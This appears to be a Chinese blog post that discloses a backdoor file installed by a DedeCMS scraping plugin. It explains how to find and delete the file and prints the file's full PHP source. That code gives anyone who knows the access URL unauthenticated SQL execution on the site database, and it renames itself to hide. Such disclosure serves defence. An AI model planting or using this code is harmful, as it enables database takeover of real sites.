去除官方后门方法：安装好采集大师后，请立即删除 include目录下的dedesql.query.php文件，如已经安装过，有可能文件已被改名为arc.sqlquery.class.php，找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库，并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说，方法：

http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo

输入以上网址，即可打开后门界面。

说实话，会故意留后门的程序，最好的方法就是别用。这个后门被发现了，天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下：

复制代码 代码如下:

<?php

require_once(dirname(__FILE__)."/../include/common.inc.php");

if(emptyempty($dopost))

{

$dopost = "";

}

if($dopost=="rename")

{

if(rename('dedesql.query.php','arc.sqlquery.class.php')){

echo "成功！";

}else{

echo "失败！";

}

exit();

}

if($dopost=="viewinfo")

{

if(emptyempty($tablename))

{

echo "没有指定表名！";

}

else

{

$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);

$dsql->Execute('me');

$row2 = $dsql->GetArray('me',MYSQL_BOTH);

$ctinfo = $row2[1];

echo "<xmp>".trim($ctinfo)."</xmp>";

}

exit();

}

if($dopost=="index")

{

require_once(DEDEINC.'/arc.partview.class.php');

$envs = $_sys_globals = array();

$envs['aid'] = 0;

$pv = new PartView();

$row = $pv->dsql->GetOne('Select * From `#@__homepageset`');

$templet = str_replace("{style}",$cfg_df_style,$row['templet']);

$homeFile = dirname(__FILE__).'/'.$row['position'];

$homeFile = str_replace("//","/",str_replace("","/",$homeFile));

$fp = fopen($homeFile,'w') or die("无法更新网站主页到：$homeFile 位置");

fclose($fp);

$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;

$pv->SetTemplet($tpl);

$pv->SaveToHtml($homeFile);

$pv->Close();

echo "成功更新首页！";

exit();

}

else if($dopost=="query")

{

$sqlquery = trim(stripslashes($sqlquery));

if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery))

{

echo "<span>删除'数据表'或'数据库'的语句不允许在这里执行。</span>";

exit();

}

if(eregi("^select ",$sqlquery))

{

$dsql->SetQuery($sqlquery);

$dsql->Execute();

if($dsql->GetTotalRow()<=0)

{

echo "运行SQL：{$sqlquery}，无返回记录！";

}

else

{

echo "运行SQL：{$sqlquery}，共有".$dsql->GetTotalRow()."条记录，最大返回100条！";

}

$j = 0;

while($row = $dsql->GetArray())

{

$j++;

if($j>100)

{

break;

}

echo "<hr size=1 width='100%'/>";

echo "记录：$j";

echo "<hr size=1 width='100%'/>";

foreach($row as $k=>$v)

{

echo "<font color='red'>{$k}：</font>{$v}<br/>rn";

}

}

exit();

}

if($querytype==2)

{

$sqlquery = str_replace("r","",$sqlquery);

$sqls = split(";[ t]{0,}n",$sqlquery);

$nerrCode = "";$i=0;

foreach($sqls as $q)

{

$q = trim($q);

if($q=="")

{

continue;

}

$dsql->ExecuteNoneQuery($q);

$errCode = trim($dsql->GetError());

if($errCode=="")

{

$i++;

}

else

{

$nerrCode .= "执行： <font color='blue'>$q</font> 出错，错误提示：<font color='red'>".$errCode."</font><br>";

}

}

echo "成功执行{$i}个SQL语句！<br><br>";

echo $nerrCode;

}

else

{

$dsql->ExecuteNoneQuery($sqlquery);

$nerrCode = trim($dsql->GetError());

echo "成功执行1个SQL语句！<br><br>";

echo $nerrCode;

}

exit();

}

if($dopost=="view")

{

;echo '<html>

<head>

<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>

<title>SQL命令行工具</title>

<link href='img/base.css' rel='stylesheet' type='text/css'>

</head>

<body background='img/allbg.gif' leftmargin='8' topmargin='8'>

<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA">

<tr>

<td height="19" background="img/tbg.gif">

<table width="96%" border="0" cellspacing="1" cellpadding="1">

<tr>

<td width="24%"><strong>SQL命令运行器：</strong></td>

<td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b>

| <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b>

</td>

</tr>

</table>

</td>

</tr>

<tr>

<td height="200" bgcolor="#FFFFFF" valign="top">

<table width="100%" border="0" cellspacing="4" cellpadding="2">

<form action="" method="post" name="infoform" target="stafrm">

<input type='hidden' name='dopost' value='viewinfo' />

<tr bgcolor="#F3FBEC">

<td width="15%" height="24" align="center">系统的表信息：</td>

<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>

<td width="35%">

<select name="tablename" id="tablename" size="6">

';

$dsql->SetQuery("Show Tables");

$dsql->Execute('t');

while($row = $dsql->GetArray('t',MYSQL_BOTH))

{

$dsql->SetQuery("Select count(*) From ".$row[0]);

$dsql->Execute('n');

$row2 = $dsql->GetArray('n',MYSQL_BOTH);

$dd = $row2[0];

echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>rn";

}

;echo ' </select>

</td>

<td width="2%"></td>

<td width="63%" valign="bottom">

<div>

<input type="Submit" name="Submit1" value="优化选中表" />

<br />

<input type="Submit" name="Submit2" value="修复选中表" />

<br />

<input type="Submit" name="Submit3" value="查看表结构" />

</div>

<div>

<input type="Submit" name="Submit5" value="优化全部表" />

<br />

<input type="Submit" name="Submit6" value="修复全部表" />

</div>

</td>

</tr>

</table></td>

</tr>

<tr>

<td height="200" align="center">返回信息：</td>

<td>

<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe>

</td>

</tr>

</form>

<form action="" method="post" name="form1" target="stafrm">

<input type='hidden' name='dopost' value='query'>

<tr>

<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行：

<input name="querytype" type="radio" value="0">

单行命令（支持简单查询）

<input name="querytype" type="radio" value="2" checked>

多行命令</strong></td>

</tr>

<tr>

<td height="118" colspan="2">

<textarea name="sqlquery" cols="60" rows="10" id="sqlquery"></textarea>

</td>

</tr>

<tr>

<td height="53" align="center"></td>

<td>

<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" />

</td>

</tr>

</form>

</table>

</td>

</tr>

</table>

</body>

</html>

';}

?>